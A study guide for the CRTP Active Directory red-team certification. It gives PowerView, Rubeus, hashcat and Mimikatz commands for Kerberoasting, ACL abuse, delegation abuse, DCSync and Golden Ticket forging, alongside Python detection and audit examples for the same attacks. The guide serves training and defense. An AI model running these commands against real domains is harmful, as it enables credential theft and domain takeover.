The Certified Red Team Professional (CRTP) is a highly respected, fully hands-on Active Directory security certification from Altered Security (formerly Pentester Academy). It focuses entirely on attacking Windows enterprise environments — specifically Active Directory — and is widely regarded as one of the most practical certifications available for aspiring red teamers. This guide covers what the exam entails, the key attack techniques you need to master, and how to prepare.
## What Is CRTP?
CRTP tests your ability to compromise an Active Directory environment from initial access to domain dominance. The exam is a 24-hour hands-on lab where you attack a multi-machine AD forest and answer questions based on flags you capture along the way.
The exam covers:
- Active Directory enumeration with PowerView and BloodHound
- Local privilege escalation on Windows hosts
- Lateral movement techniques
- Domain privilege escalation (Kerberoasting, AS-REP roasting, ACL abuse, delegation attacks)
- Cross-domain attacks (forest trusts, SID history abuse)
- Persistence (Golden Tickets, Silver Tickets, skeleton keys, DSRM abuse)
The course and lab environment cost around $299 USD for 30-day access, with a 48-hour lab extension for the exam. A passing score requires completing 80% of the exam objectives.
## The Course: Attacking and Defending Active Directory
The official course covers these major topic areas:
### AD Enumeration with PowerView
PowerView is a PowerShell framework for Active Directory reconnaissance that doesn’t require elevated privileges:
```powershell
# Import PowerView (dot-source the script into the current session)
. .\PowerView.ps1
# Get domain information
Get-Domain
Get-DomainController
# Enumerate users
Get-DomainUser | select samaccountname, description
# Find admin users
Get-DomainGroupMember "Domain Admins"
# Find computers
Get-DomainComputer | select name, operatingsystem
# Find user accounts with SPNs (Kerberoasting candidates)
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
```
### BloodHound for Attack Path Analysis
BloodHound graphically maps AD permissions and finds shortest attack paths to Domain Admin:
```powershell
# Collect AD data with SharpHound
.\SharpHound.exe -c all --outputdirectory C:\temp\
# Or using the PowerShell version
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp\
```
Import the ZIP into BloodHound and use built-in queries:
- “Find Shortest Paths to Domain Admins”
- “Find Principals with DCSync Rights”
- “Shortest Paths to Unconstrained Delegation Systems”
BloodHound often reveals non-obvious attack paths that manual enumeration misses entirely.
### Kerberoasting and AS-REP Roasting
Kerberoasting targets service accounts that have SPNs set, since any domain user can request a service ticket encrypted with the account's password hash:
```powershell
# With PowerView
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv tickets.csv
# Or with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
```
AS-REP roasting targets accounts that have Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag):
```powershell
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
```
Crack both with Hashcat:
```shell
# Kerberoasting (mode 13100)
hashcat -m 13100 hashes.txt rockyou.txt
# AS-REP (mode 18200)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
```
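Both attacks leave a distinctive trace on the domain controllers: Kerberoasting shows up as one account requesting RC4 (etype 0x17) service tickets for many user-account SPNs in a short burst (event 4769), and AS-REP roasting as a TGT issued with pre-authentication type 0 (event 4768). The following is an added detection prototype written for this guide, not code from the CRTP course or from Altered Security; it runs over constructed, already-parsed event dicts in the shape a log shipper would emit, and the field names, threshold and time window are assumptions you would tune to your own telemetry.

```python
"""Prototype SIEM rule for Kerberoasting / AS-REP roasting over Security log events.

Added example for this guide, not code from the CRTP course or Altered Security.
Input: already-parsed event dicts (as a log shipper would emit them); the sample
events below are constructed for the demo, not captured from a real domain.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"    # TicketEncryptionType value for RC4-HMAC (etype 23)
NO_PREAUTH = "0"     # PreAuthType 0 = no pre-authentication was performed

# Constructed sample events (fields named as in the Windows Security log XML).
SAMPLE_EVENTS = [
    # Normal workstation traffic: AES service ticket to a file server.
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:00:01", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
    # Roasting pattern: one user requests RC4 tickets for many service accounts in seconds.
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:02", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:03", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    # Machine-account service tickets are excluded even when RC4 (legacy hosts).
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:04", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "OLDHOST$", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    # AS-REP roasting: TGT issued with no pre-authentication and RC4.
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:02:00", "TargetUserName": "svc_legacy",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    # Normal TGT request with pre-auth (type 2 = encrypted timestamp).
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:02:05", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
]

def is_roastable_service(service_name):
    """Service tickets for user accounts are the Kerberoast target; skip machine
    accounts (trailing '$') and krbtgt, which produce RC4 noise on legacy networks."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"

def detect_kerberoasting(events, threshold=3, window=timedelta(minutes=5)):
    """Return {requester: sorted service list} for requesters that asked for RC4
    service tickets to >= threshold distinct user-account SPNs within the window."""
    per_user = defaultdict(list)  # requester -> [(time, service)]
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        if not is_roastable_service(e["ServiceName"]):
            continue
        per_user[e["TargetUserName"]].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()
        # Sliding window: any span of `window` holding >= threshold distinct services.
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                hits[user] = sorted(services)
                break
    return hits

def detect_asrep_roasting(events):
    """Return account names that obtained a TGT with pre-authentication disabled
    (PreAuthType 0); with RC4 the reply is directly crackable offline."""
    return sorted(e["TargetUserName"] for e in events
                  if e["EventID"] == 4768 and e["PreAuthType"] == NO_PREAUTH)

if __name__ == "__main__":
    print("Kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("AS-REP roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
```

The RC4 filter is what keeps the rule quiet: modern clients request AES tickets, so a burst of etype 0x17 requests for user-account SPNs is the signal, and the same logic doubles as an inventory check when you move those service accounts to AES-only or to group managed service accounts.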
### ACL Abuse
One of CRTP’s core topics is abusing Active Directory Access Control Lists. Common exploitable rights:
| Right | Abuse |
|---|---|
| GenericAll | Full control: reset password, add to group |
| GenericWrite | Write attributes: set an SPN for targeted Kerberoasting |
| WriteDACL | Add your own ACL entries |
| WriteOwner | Take ownership, then WriteDACL |
| ForceChangePassword | Change the password without knowing the current one |
Example: If user jsmith has GenericAll over Domain Admins, use PowerView to add them:
```powershell
Add-DomainGroupMember -Identity "Domain Admins" -Members jsmith
```
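The reason ACL abuse is hard to spot by hand is that the dangerous right is rarely held directly on Domain Admins; it is usually two or three hops away (a helpdesk group can reset a user, that user owns a service account, the service account can add members to the group). BloodHound finds these chains with a graph search, and the same search is how a defender finds what to remediate. The following is an added example written for this guide, not BloodHound's or PowerView's code: it treats the rights from the table above as directed edges and does a breadth-first search from every principal to a high-value target. The ACE list, principal names and the "AddMember" edge label (BloodHound's name for write access to a group's member attribute) are constructed assumptions; a real run would read the ACEs from an export of your directory's security descriptors.

```python
"""Find ACL-based escalation paths to a high-value group, BloodHound-style.

Added example for this guide (not BloodHound's or PowerView's code). The ACE list
below is constructed; in practice it would come from an export of the ACLs on
your directory objects.
"""
from collections import deque

# Rights that let the holder take control of the target (mirrors the table above).
# "AddMember" is BloodHound's label for write access to a group's member attribute.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteDACL", "WriteOwner",
                  "ForceChangePassword", "AddMember"}

# Constructed ACEs: (principal, right, target).
SAMPLE_ACES = [
    ("Domain Admins", "GenericAll", "Domain Admins"),   # expected self-control
    ("helpdesk", "ForceChangePassword", "jsmith"),       # helpdesk can reset jsmith
    ("jsmith", "WriteOwner", "svc_admin"),               # jsmith can take ownership of svc_admin
    ("svc_admin", "AddMember", "Domain Admins"),         # svc_admin can add DA members
    ("auditors", "GenericRead", "Domain Admins"),        # read-only, not abusable
    ("backup_ops", "GenericWrite", "FS01$"),             # abusable, but not on a path to DA
]

# Principals whose control over the target is by design and should not alert.
EXPECTED_CONTROLLERS = {"Domain Admins", "Enterprise Admins", "Administrators"}

def build_graph(aces):
    """Adjacency list: principal -> {target: right}, keeping abusable rights only."""
    graph = {}
    for principal, right, target in aces:
        if right in CONTROL_RIGHTS:
            graph.setdefault(principal, {})[target] = right
    return graph

def paths_to(target, aces, ignore=EXPECTED_CONTROLLERS):
    """Breadth-first search from every principal to `target`; return the shortest
    path for each principal that can reach it, as a list of (node, right, node) hops."""
    graph = build_graph(aces)
    results = {}
    for start in graph:
        if start in ignore or start == target:
            continue
        queue = deque([(start, [])])
        seen = {start}
        while queue:
            node, path = queue.popleft()
            if node == target:
                results[start] = path
                break
            for nxt, right in graph.get(node, {}).items():
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append((nxt, path + [(node, right, nxt)]))
    return results

def format_path(path):
    """Render hops as 'a [Right] -> b [Right] -> target'."""
    return " -> ".join(f"{a} [{r}]" for a, r, _ in path) + f" -> {path[-1][2]}"

if __name__ == "__main__":
    for principal, path in paths_to("Domain Admins", SAMPLE_ACES).items():
        print(f"{principal}: {format_path(path)}")
```

Every principal the search reports is a remediation item: either the right is unnecessary and should be removed, or the account holding it belongs in the same protection tier as the target.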
### Delegation Attacks
Unconstrained delegation: a machine with this flag set caches the TGT of every user who authenticates to it. If you compromise such a machine:
```powershell
# Find computers configured for unconstrained delegation
Get-DomainComputer -Unconstrained | select name
# Use Rubeus to monitor for new logons and extract cached TGTs
.\Rubeus.exe monitor /interval:5 /nowrap
```
Constrained delegation with protocol transition: the service account can impersonate any user, but only to the services listed in its msDS-AllowedToDelegateTo attribute:
```powershell
# S4U2Self + S4U2Proxy to get a service ticket as Administrator
.\Rubeus.exe s4u /user:serviceaccount /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /ptt
```
Resource-based Constrained Delegation (RBCD) — if you have write access to a computer object’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, you can configure delegation to allow your controlled computer to impersonate any user to that target.
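All three delegation variants, as well as the AS-REP and Kerberoasting targets from the enumeration section, are visible in a handful of directory attributes: bits in userAccountControl (TRUSTED_FOR_DELEGATION, TRUSTED_TO_AUTH_FOR_DELEGATION, DONT_REQ_PREAUTH), msDS-AllowedToDelegateTo, msDS-AllowedToActOnBehalfOfOtherIdentity and servicePrincipalName. The following is an added audit script written for this guide, not PowerView or ActiveDirectory-module code; it decodes those attributes from constructed records in the shape of an LDAP export and reports the risky settings a defender would want to review. Domain controllers are exempted from the unconstrained-delegation finding because they hold that flag by design; everything else flagged is a candidate for cleanup.

```python
"""Audit an LDAP export for risky account settings: Kerberos pre-auth disabled,
unconstrained / constrained / resource-based delegation, and user SPNs.

Added example for this guide, not PowerView or ActiveDirectory-module code. The
records below are constructed; a real run would read them from an LDAP export
of every user and computer object.
"""

# userAccountControl bit flags (documented values from the AD schema).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account

# Constructed records: sAMAccountName plus the attributes that matter here.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000,        # DC: unconstrained by design
     "servicePrincipalName": ["ldap/dc01.corp.local"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000,       # member server, unconstrained
     "servicePrincipalName": ["HTTP/web01.corp.local"]},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,      # user with SPN (Kerberoastable)
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x400200,  # pre-auth disabled
     "servicePrincipalName": []},
    {"sAMAccountName": "svc_proxy", "userAccountControl": 0x1000200,  # protocol transition
     "servicePrincipalName": ["HTTP/proxy.corp.local"],
     "msDS-AllowedToDelegateTo": ["cifs/dc01.corp.local"]},
    {"sAMAccountName": "FS01$", "userAccountControl": 0x1000,         # RBCD configured on target
     "servicePrincipalName": ["cifs/fs01.corp.local"],
     "msDS-AllowedToActOnBehalfOfOtherIdentity": "<security descriptor bytes>"},
    {"sAMAccountName": "alice", "userAccountControl": 0x200, "servicePrincipalName": []},
]

def audit_object(obj):
    """Return the list of finding labels for one directory object."""
    uac = obj["userAccountControl"]
    name = obj["sAMAccountName"]
    is_computer = name.endswith("$")
    is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
    findings = []
    if uac & TRUSTED_FOR_DELEGATION and not is_dc:
        findings.append("unconstrained-delegation")   # caches every caller's TGT
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        findings.append("protocol-transition")        # S4U2Self for arbitrary users
    if obj.get("msDS-AllowedToDelegateTo"):
        findings.append("constrained-delegation")     # review the listed target SPNs
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd-configured")            # review who may write this attribute
    if uac & DONT_REQ_PREAUTH:
        findings.append("no-preauth")
    if not is_computer and obj.get("servicePrincipalName"):
        findings.append("user-spn")                   # Kerberoastable user account
    return findings

def audit(objects):
    """Map sAMAccountName -> findings, omitting clean objects."""
    report = {}
    for obj in objects:
        findings = audit_object(obj)
        if findings:
            report[obj["sAMAccountName"]] = findings
    return report

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_OBJECTS).items():
        print(f"{name}: {', '.join(findings)}")
```

The RBCD finding is deliberately about the target, not the attacker: the attribute lives on the computer being impersonated to, so the review question is which principals hold write access to it, which is exactly the ACL question from the previous section.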
### Domain Persistence
Once you achieve Domain Admin:
Golden Ticket: forge TGTs using the KRBTGT account's hash:
```powershell
# Get the KRBTGT hash via DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
# Forge a Golden Ticket and inject it into the current session
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt"'
```
Silver Ticket: forge a service ticket for a specific service using that service's machine account hash. It never touches the DC, so it is more covert than a Golden Ticket.
DCSync: pull any account's hash without logging on to the DC, by asking the DC to replicate it as another DC would:
```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
```
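DCSync works because the caller holds the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), and a DC audits the use of those rights as Security event 4662 with a control-access mask and the right's GUID in the Properties field. Legitimate replication comes only from other domain controllers (and, where deployed, the Azure AD Connect service account), so any other account exercising those rights is a DCSync alert. The following is an added detection example written for this guide, not code from Altered Security; the events are constructed dicts in the shape a log shipper emits, and the allow-list of legitimate replicators is an assumption you would replace with your own DC list.

```python
"""Detect DCSync from Security event 4662 (directory service object access).

Added example for this guide, not Altered Security's code. Events are constructed
dicts in the shape a log shipper emits; the allow-list of legitimate replicators
(domain controllers, AAD Connect service account) is an assumption for the demo.
"""
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for extended rights such as replication

# Accounts expected to replicate: DC machine accounts and the AAD Connect account.
LEGITIMATE_REPLICATORS = {"DC01$", "DC02$", "MSOL_a1b2c3d4"}   # constructed names

SAMPLE_EVENTS = [
    # Normal inter-DC replication.
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # DCSync from a compromised user account.
    {"EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary 4662 that is not a replication request.
    {"EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x20",
     "Properties": "%%7685\n{bf967a68-0de6-11d0-a285-00aa003049e2}"},
    # Unrelated event ID.
    {"EventID": 4624, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP"},
]

def replication_rights_requested(event):
    """Return the names of replication extended rights present in Properties."""
    props = event.get("Properties", "").lower()
    return sorted(name for guid, name in REPLICATION_GUIDS.items() if guid in props)

def detect_dcsync(events, allowlist=LEGITIMATE_REPLICATORS):
    """Return (account, rights) pairs for 4662 control-access events that request
    replication rights from an account outside the allow-list."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        if int(e.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights_requested(e)
        if not rights:
            continue
        if e["SubjectUserName"] not in allowlist:
            account = f"{e['SubjectDomainName']}\\{e['SubjectUserName']}"
            alerts.append((account, rights))
    return alerts

if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {account} requested {', '.join(rights)}")
```

Auditing of directory service access must be enabled for 4662 to be generated at all, and once a DCSync of krbtgt is suspected the recovery step is resetting the KRBTGT password twice (with a replication interval between resets), which invalidates every Golden Ticket forged from the old hash.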
### Cross-Forest Attacks
With Enterprise Admin or appropriate trust relationships, attack across forest trusts using SID history injection and foreign principal abuse.
## Study Resources
- Official CRTP course — alteredsecurity.com — the primary resource
- Hack The Box Pro Labs (RastaLabs, Offshore) — challenging AD environments for practice
- VulnLab — realistic AD labs purpose-built for red team practice
- TryHackMe — “Post-Exploitation Basics” and “Active Directory Basics” paths
- S1ren’s AD Attack notes — excellent community-written notes freely available on GitHub
- The Hacker Recipes — thehacker.recipes — comprehensive AD attack reference
## Recommended Lab Practice Order
1. Set up a basic AD lab locally (Windows Server 2022 DC + 2 Windows 10 workstations)
2. Enumerate with PowerView until you can do it from memory
3. Practice Kerberoasting and AS-REP roasting
4. Practice ACL abuse using BloodHound to identify paths
5. Practice delegation attacks (unconstrained → constrained → RBCD)
6. Practice DCSync and Golden Ticket persistence
7. Complete the CRTP course labs end-to-end
CRTP is a challenging but fair exam that rewards candidates who have truly practiced these techniques rather than just reading about them. Completing it prepares you directly for CRTE (Certified Red Team Expert) and significantly strengthens your readiness for OSCP.